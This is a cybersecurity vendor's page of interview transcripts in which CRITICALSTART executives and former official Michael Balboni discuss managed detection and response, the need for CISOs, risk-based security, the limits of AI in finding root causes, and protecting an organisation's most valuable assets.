LW: Well, thank you, Randy. Once again this has been Randy Watkins, CTO with CRITICALSTART. Don’t let the guitars and black t-shirt fool you. It’s not Dave Grohl even though a few times I thought it might have been. I’m sure Dave Grohl knows much about MDR, but again this is Lee Waskevich. I’m vice president of security at ePlus. Thanks for joining.

RW: Thank, Lee.

Podcast: The Last Watchdog Interview with Randy Watkins

“Security is really the art of handling risk” – Randy Watkins, CTO of CRITICALSTART.

It’s clear that managed security services providers (MSSPs) have a ripe opportunity to step into the gap and help small-to-medium-sized businesses (SMBs) and small-to-medium-sized enterprises (SMEs) meet the daunting challenge of preserving the privacy and security of sensitive data.

CRITICALSTART is making some hay in this space — by striving to extend the roles traditionally played by MSSPs. The company has coined the phrase managed detection and response, or MDR, to more precisely convey the type of help it brings to the table.

Recently our CTO, Randy Watkins, spoke to Byron Acohido of The Last Watchdog about the difference between ‘risk-oriented’ versus ‘controlled-based’ security and how quantifying risks is the first step to defending network breaches.

Read Acohido’s blog and listen to the full podcast interview

The Last Watchdog | October 4, 2019

Security and the Human Element: The Need for the Organizational CISO

In cybersecurity, humans will always have a role to play. Security incidents need critical decision-making factors that require human analytics. CRITCALSTART’s Jordan Mauriello and Michael Balboni, President of Redland Strategies, and former Senator, assemblyman, advisor to Homeland Security, have some thoughts on the role of humans and where machines fit into cybersecurity.

Full Transcript:

Hey guys, Jordan Mauriello with CRITICALSTART here, Senior Vice President of Managed Services. Today I have with me Michael Balboni, President of Redland Strategies, former Senator, Assemblyman, advisor to Homeland Security. Honored to have him here with us today. We’ve been doing some awesome discussions about things that we’re doing at CRITICALSTART and working with Redland Strategies.

Today we wanted to take an opportunity just to talk to Michael about some general cybersecurity issues. He’s a major influencer in our community. I know many of you already know who he is, and has had a major impact even on some of the legislature that we’ve seen around our industry too as well. We want to take the time to get some thoughts from him on some of the direction the industry’s going and the impact that some of the changes we see in cyber in general are having on national defense, the role of Senate and Congress, and where that’s going from a legislature perspective.

We’re going to open up and have a nice, fun conversation here about some of these issues. Thank you so much for being with us, Michael.

Thanks for having me Jordan, and thanks for your service to the country in the military.

Thank you very much, sir. I appreciate your support.

You definitely see this massive difference in organizations and capability and there’s not a standard set maturity. We have some customers that we walk in and we can’t believe how mature they are. Great leadership and they really understand the problems, they know the industry and generally, what we see are guys who have the right experience, come from backgrounds that we’ve kind of expect with the technical understanding and knowledge.

A lot of times they’re from government cybersecurity roles and they have the understanding of how to come and identify and begin to protect a threat. But, we don’t have a standard that we’re committing to either as well. Even though we have some great ones. The NIST cybersecurity framework is fantastic, but how many organizations are actually committing to and doing that today? It’s very, very few.

It’s amazing how many corporations that I’ve seen from a $25 million to a $100 million capitalization that don’t even have a Chief Information Security Officer. It’s their IT guy and their physical security guy and never the twain shall meet that. It’s still that divide. I think that obviously one of the key requirements under NIST is to have a Chief Information Security Officer, have one person who’s responsible for not only setting up the different security architectures, but then monitoring the network, devising a response protocol and being able to call out to different vendors so that you can bring people in and say, “First of all, let’s do a penetration test on my network.” Really, really crucial. Let’s have a vulnerably assessment, periodically. Let’s have training of staff. We always say that defense should be totally, completely automated. Not always. There is a human interface. It’s very important.

It depends upon where in the kill chain, that is the Lockheed Martin developed set of steps that an attacker has to take to make something a weapon, and insert it into a network. Where along the kill chain can a human interface come and recognize the threat and stop it? We’ve kind of lost it. We want to say, as they say, the Terminator kind, machine versus machine. There should be no humans involved. Well, no. That’s not exactly correct. Humans have a role to play. It’s just perhaps further down the line when a threat has been identified and is a resolution to that threat, then the human can play a role in that.

Yeah, I completely agree. I think the importance of artificial intelligence and machine learning has been massively overplayed in our space right now. They become buzzwords and everybody wants to throw them in their technology and say they have ML or AI. The reality of it is it’s still a very limited technology set. You cannot do causation with AI or ML today.

Explain that to me. What do you mean by causation?

An AI and ML cannot answer why something happened for you. When you’re getting to what should be the human interface point in security, maybe you’re using some sort of analytic engine to distill down data. You get an incident that requires analysis and you want to ask, “Why did this happen? What’s the root cause of this incident and can I prove that known good or known bad?” That requires a human. It’s a critical decision making factor that requires human analytics and the machine can’t do that for us yet. Nobody in the world can with AI yet.

Now that’s not to say it won’t. In fact, I think one of the fathers of modern machine learning and AI, Judea Pearl, wrote a great book recently and I highly recommend, called “The Book of Why”. He’s talking specifically about this problem. We can’t do causation yet with AI and ML. We still need to understand that it’s use case-specific, that it applies to certain things, that it can do detection for us, that it can produce maybe some visibility mechanisms we didn’t have before. The end of it, when you’re answering, “Why did that happen and what do I need to do to respond,” that’s a human and it still needs to be a human.

Securing Data: The Importance of Understanding Your Most Valuable Assets

With multiple data points that exist in organizations, how do you know what you need to protect? What constitutes reputational damage or breach for you as a company? CRITICALSTART’s SVP of Managed Security, Jordan Mauriello, and former Homeland Security advisor Michael Balboni share insights on securing data and how to protect your most valuable assets.

Full Transcript:

JM: Hey guys, Jordan Mauriello with CRITICALSTART here, Senior Vice President of Managed Services. Today I have with me Michael Balboni, President of Redland Strategies, former Senator, Assemblyman, advisor to Homeland Security. Honored to have him here with us today. We’ve been doing some awesome discussions about things that we’re doing at CRITICALSTART and working with Redland Strategies.

JM: Today we wanted to take an opportunity just to talk to Michael about some general cybersecurity issues. He’s a major influencer in our community. I know many of you already know who he is and has had a major impact even on some of the legislature that we’ve seen around our industry too as well. We want to take the time to get some thoughts from him on some of the direction the industry’s going impact that some of the changes we see in cyber in general are having on national defense, the role of Senate and Congress, and where that’s going from a legislature perspective.

JM: We’re going to open up and have a nice, fun conversation here about some of these issues. Thank you so much for being with us, Michael.

Thanks for having me Jordan, and thanks for your service to the country in the military.

JM: Thank you very much, sir. I appreciate your support.

JM: You know, we haven’t even necessarily decided what to protect. One of the things that I see even as a consultant in doing CISO work for organizations is going in. The first question we’re always asking is “What are the crown jewels? What do you need to protect? What’s important to your business? What constitutes reputational damage or breach for you as a company?” You start with that question and I think often from a national defense perspective that we’re not properly gathering the data on what that answer is. I don’t think we necessarily know exactly what things are the most important to us. We look at the defense systems themselves and we look at DOD and we say, “Okay, well here are our military assets. Let’s protect those vehemently.”

JM: What about the supporting infrastructure? Are we doing enough to protect SCADA systems and critical infrastructure here in it? I think to answer to that, like you said, is it’s woefully uninvested or under-invested and we’ve seen that generally too out in the field as we go out there. We’re very often surprised as we walk into organizations who we would expect to be at a very high standard to see that the decisions around risks that are being made in those organizations are definitely not what we would expect.

MB: In the board rooms, typically board members don’t have an appreciation of the exposure that cyber provides them. They may have a pretty good understanding of what their regulatory requirements are, but they’re not in the weeds as to what steps are being done every day to make sure that their network is safe and operational. A lot of times, they believe that the mission of the corporation, the mission of the board, and that’s what you drive to, and cybersecurity is kind of a one-off. “Yeah, okay. We got to check that box,” but in checking that box, you don’t ask the deeper probing questions and that’s because it’s frankly just too complex.

©2020 CRITICALSTART. This site is protected by reCAPTCHA and the Google Privacy Policy and Terms of Service apply.
©2021 CRITICALSTART. This site is protected by reCAPTCHA and the Google Privacy Policy and Terms of Service apply.